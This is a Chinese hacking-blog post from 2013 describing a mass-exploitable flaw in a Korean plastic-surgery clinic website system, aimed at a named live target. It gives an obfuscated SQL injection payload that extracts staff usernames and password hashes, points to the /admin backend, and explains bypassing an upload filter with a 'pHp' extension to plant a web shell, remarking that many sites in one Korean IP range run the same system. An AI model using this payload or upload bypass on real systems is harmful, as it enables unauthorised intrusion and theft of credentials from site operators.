记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

韩国某整形手术建站系统通杀漏洞

2013-07-25 11:15
韩文看得稍蛋疼,不知道是何建站系统。

target:http://www.krbelongstoprc.kr

伪静态注射点:

\

 
exp:

/**//*!30000and(select/**/1/**/from(select/**/count(*),concat(select/**/(select/**/(select/**/concat(user_id,0x40,passwd)/**/from/**/staff/**/Order/**/by/**/no/**/limit/**/0,1)/**/)/**/from/**/`information_schema`.tables/**/limit/**/0,1)x/**/from/**/`information_schema`.tables/**/group/**/by/**/x)a)/**/and/**/1=1*/

 


\

后台:/admin

\

后台限制了上传,使用新版本ckeditor,不可重命名。另一上传点对文件名作了检查,包含php或者html则禁止上传。黑盒测试了一下,突破方法很简单,将后缀改成pHp即可成功上传:

\

shell:

\

 

 

经查韩国某IP段几乎清一色该系统,懒得批量了,笔记到此结束

知识来源: www.2cto.com/Article/201307/230728.html

阅读:83980 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“韩国某整形手术建站系统通杀漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云